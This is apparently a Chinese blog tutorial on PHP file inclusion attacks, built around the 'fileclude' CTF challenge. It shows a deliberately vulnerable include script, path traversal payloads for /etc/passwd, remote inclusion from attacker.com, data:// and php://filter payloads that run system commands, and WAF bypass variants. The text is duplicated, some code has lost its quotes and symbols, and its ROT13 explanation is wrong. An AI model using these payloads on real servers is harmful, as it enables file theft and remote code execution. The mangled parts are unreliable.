PHP文件包含漏洞实战从fileclude题目看5种高级利用技术在Web安全领域文件包含漏洞就像一把双刃剑——它既是攻击者突破系统防线的利器也是开发者安全意识的重要试金石。攻防世界中的fileclude题目恰好为我们提供了一个绝佳的研究样本让我们得以深入探讨PHP文件包含漏洞的各种精妙利用方式。1. 漏洞原理与环境搭建文件包含漏洞本质上源于程序对用户输入的不当信任。当PHP代码使用include、require等函数时如果未对包含的文件路径进行严格过滤攻击者就能通过构造特殊路径实现任意文件读取或代码执行。我们先搭建一个模拟环境// vuln.php ?php $file $_GET[file]; include($file); ?这个简单的代码片段已经包含了致命的安全隐患。让我们通过几个真实案例来理解其危险性案例1直接包含系统文件http://example.com/vuln.php?file/etc/passwd案例2远程包含恶意代码http://example.com/vuln.php?filehttp://attacker.com/shell.txt注意从PHP5.2开始allow_url_include默认关闭远程文件包含需要特殊配置才能生效2. 基础利用方式剖析2.1 本地文件包含(LFI)最基本的利用方式是直接包含服务器上的敏感文件curl http://target.com/vuln.php?file../../../../etc/passwd常见敏感文件路径/etc/passwd用户账户信息/proc/self/environ环境变量/var/log/apache2/access.log访问日志.htaccess服务器配置2.2 路径遍历技巧当基础路径被限制时可以使用多种绕过方式// 点号截断PHP5.3 ?file../../etc/passwd%00 // 超长路径Windows ?file../../../../../../../../../../etc/passwd // 编码绕过 ?file..%2F..%2Fetc%2Fpasswd3. 高级协议利用技术3.1 data协议利用data协议允许直接在URL中嵌入文件内容是文件包含漏洞中最经典的利用方式之一?filedata://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8这段代码会解码并执行base64编码的PHP代码?php phpinfo();?。在fileclude题目中正是通过data协议传递了hello ctf字符串。data协议格式详解data:[mediatype][;base64],data3.2 PHP过滤器妙用PHP的过滤器功能可以用于读取源代码绕过某些限制?filephp://filter/convert.base64-encode/resourceconfig.php这个请求会返回config.php文件的base64编码内容解码后即可获取源代码。fileclude题目中当直接data协议无效时正是通过php过滤器获取了flag。常用过滤器组合过滤器类型作用示例convert.base64-encodeBase64编码resourceindex.phpstring.rot13ROT13编码readstring.rot13/resourceflag.phpzlib.deflate压缩数据convert.zlib.deflate/resourceadmin.php3.3 预期之外的协议组合除了上述常见协议还有一些特殊组合值得关注// 压缩流处理 ?filecompress.zlib:///var/www/html/config.php // 临时文件利用 ?filephp://temp/PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4 // 标准输入流 ?filephp://stdincmdid4. 编码与转换技巧4.1 Base64的攻防艺术Base64不仅用于编码输出还能创造性地用于输入处理// 多层编码绕过 ?filephp://filter/convert.base64-decode|convert.base64-decode/resourceflag.php // 配合包含链使用 ?filedata://text/plain;base64,PD9waHAgaW5jbHVkZSgkX0dFVFsnZmlsZSddKTs/Pgfileflag.php4.2 ROT13的另类应用虽然ROT13在fileclude题目中未能奏效但在某些特殊场景下仍有价值?filephp://filter/readstring.rot13/resourceflag.phpROT13的特点是对字母进行13位移位处理后再反转即可恢复原内容# Python实现ROT13解码 import codecs print(codecs.encode(frperg, rot_13)) # 输出: secret4.3 字符编码绕过技巧当特殊字符被过滤时可以尝试多种编码方式// UTF-16编码 ?filephp://filter/convert.iconv.utf-8.utf-16/resourceflag.php // UCS-2编码 ?filephp://filter/convert.iconv.utf-8.ucs-2/resourceflag.php5. 实战中的组合拳真正的渗透测试中往往需要组合多种技术。以fileclude题目为例完整的攻击链可能是初步探测尝试直接包含flag.php协议测试当直接包含失败时转向data协议内容验证确认需要提交特定字符串过滤器利用通过php过滤器获取源代码编码处理对获取的内容进行解码分析典型攻击流程表格步骤技术示例目的1直接包含?fileflag.php快速验证漏洞2路径遍历?file../../flag.php突破目录限制3协议利用?filephp://filter/convert.base64-encode/resourceflag.php绕过内容显示限制4编码处理Base64解码输出获取可读内容5代码执行?filedata://text/plain,?php system(id);?提升权限在真实环境中防御措施往往更加复杂。现代WAF系统通常会检测常见的攻击模式因此需要不断调整攻击手法。例如当直接使用php过滤器被拦截时可以尝试以下变种?filePHP://FilTer/convert.base64-encode/resourceflag.php # 大小写混淆 ?filephp://filter/convert.base64-encode/.../resourceflag.php # 插入多余路径 ?filephp:/.%0a/./filter/convert.base64-encode/resourceflag.php # 换行符干扰文件包含漏洞的防御需要开发者从多个层面入手严格过滤输入、关闭不必要的协议支持、保持PHP版本更新等。但作为安全研究人员理解这些攻击技术的原理和演变才能更好地构建防御体系。
PHP文件包含漏洞的5种利用方式:从攻防世界fileclude题目说开去
发布时间:2026/5/31 12:03:33
PHP文件包含漏洞实战从fileclude题目看5种高级利用技术在Web安全领域文件包含漏洞就像一把双刃剑——它既是攻击者突破系统防线的利器也是开发者安全意识的重要试金石。攻防世界中的fileclude题目恰好为我们提供了一个绝佳的研究样本让我们得以深入探讨PHP文件包含漏洞的各种精妙利用方式。1. 漏洞原理与环境搭建文件包含漏洞本质上源于程序对用户输入的不当信任。当PHP代码使用include、require等函数时如果未对包含的文件路径进行严格过滤攻击者就能通过构造特殊路径实现任意文件读取或代码执行。我们先搭建一个模拟环境// vuln.php ?php $file $_GET[file]; include($file); ?这个简单的代码片段已经包含了致命的安全隐患。让我们通过几个真实案例来理解其危险性案例1直接包含系统文件http://example.com/vuln.php?file/etc/passwd案例2远程包含恶意代码http://example.com/vuln.php?filehttp://attacker.com/shell.txt注意从PHP5.2开始allow_url_include默认关闭远程文件包含需要特殊配置才能生效2. 基础利用方式剖析2.1 本地文件包含(LFI)最基本的利用方式是直接包含服务器上的敏感文件curl http://target.com/vuln.php?file../../../../etc/passwd常见敏感文件路径/etc/passwd用户账户信息/proc/self/environ环境变量/var/log/apache2/access.log访问日志.htaccess服务器配置2.2 路径遍历技巧当基础路径被限制时可以使用多种绕过方式// 点号截断PHP5.3 ?file../../etc/passwd%00 // 超长路径Windows ?file../../../../../../../../../../etc/passwd // 编码绕过 ?file..%2F..%2Fetc%2Fpasswd3. 高级协议利用技术3.1 data协议利用data协议允许直接在URL中嵌入文件内容是文件包含漏洞中最经典的利用方式之一?filedata://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8这段代码会解码并执行base64编码的PHP代码?php phpinfo();?。在fileclude题目中正是通过data协议传递了hello ctf字符串。data协议格式详解data:[mediatype][;base64],data3.2 PHP过滤器妙用PHP的过滤器功能可以用于读取源代码绕过某些限制?filephp://filter/convert.base64-encode/resourceconfig.php这个请求会返回config.php文件的base64编码内容解码后即可获取源代码。fileclude题目中当直接data协议无效时正是通过php过滤器获取了flag。常用过滤器组合过滤器类型作用示例convert.base64-encodeBase64编码resourceindex.phpstring.rot13ROT13编码readstring.rot13/resourceflag.phpzlib.deflate压缩数据convert.zlib.deflate/resourceadmin.php3.3 预期之外的协议组合除了上述常见协议还有一些特殊组合值得关注// 压缩流处理 ?filecompress.zlib:///var/www/html/config.php // 临时文件利用 ?filephp://temp/PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4 // 标准输入流 ?filephp://stdincmdid4. 编码与转换技巧4.1 Base64的攻防艺术Base64不仅用于编码输出还能创造性地用于输入处理// 多层编码绕过 ?filephp://filter/convert.base64-decode|convert.base64-decode/resourceflag.php // 配合包含链使用 ?filedata://text/plain;base64,PD9waHAgaW5jbHVkZSgkX0dFVFsnZmlsZSddKTs/Pgfileflag.php4.2 ROT13的另类应用虽然ROT13在fileclude题目中未能奏效但在某些特殊场景下仍有价值?filephp://filter/readstring.rot13/resourceflag.phpROT13的特点是对字母进行13位移位处理后再反转即可恢复原内容# Python实现ROT13解码 import codecs print(codecs.encode(frperg, rot_13)) # 输出: secret4.3 字符编码绕过技巧当特殊字符被过滤时可以尝试多种编码方式// UTF-16编码 ?filephp://filter/convert.iconv.utf-8.utf-16/resourceflag.php // UCS-2编码 ?filephp://filter/convert.iconv.utf-8.ucs-2/resourceflag.php5. 实战中的组合拳真正的渗透测试中往往需要组合多种技术。以fileclude题目为例完整的攻击链可能是初步探测尝试直接包含flag.php协议测试当直接包含失败时转向data协议内容验证确认需要提交特定字符串过滤器利用通过php过滤器获取源代码编码处理对获取的内容进行解码分析典型攻击流程表格步骤技术示例目的1直接包含?fileflag.php快速验证漏洞2路径遍历?file../../flag.php突破目录限制3协议利用?filephp://filter/convert.base64-encode/resourceflag.php绕过内容显示限制4编码处理Base64解码输出获取可读内容5代码执行?filedata://text/plain,?php system(id);?提升权限在真实环境中防御措施往往更加复杂。现代WAF系统通常会检测常见的攻击模式因此需要不断调整攻击手法。例如当直接使用php过滤器被拦截时可以尝试以下变种?filePHP://FilTer/convert.base64-encode/resourceflag.php # 大小写混淆 ?filephp://filter/convert.base64-encode/.../resourceflag.php # 插入多余路径 ?filephp:/.%0a/./filter/convert.base64-encode/resourceflag.php # 换行符干扰文件包含漏洞的防御需要开发者从多个层面入手严格过滤输入、关闭不必要的协议支持、保持PHP版本更新等。但作为安全研究人员理解这些攻击技术的原理和演变才能更好地构建防御体系。
)
)
)
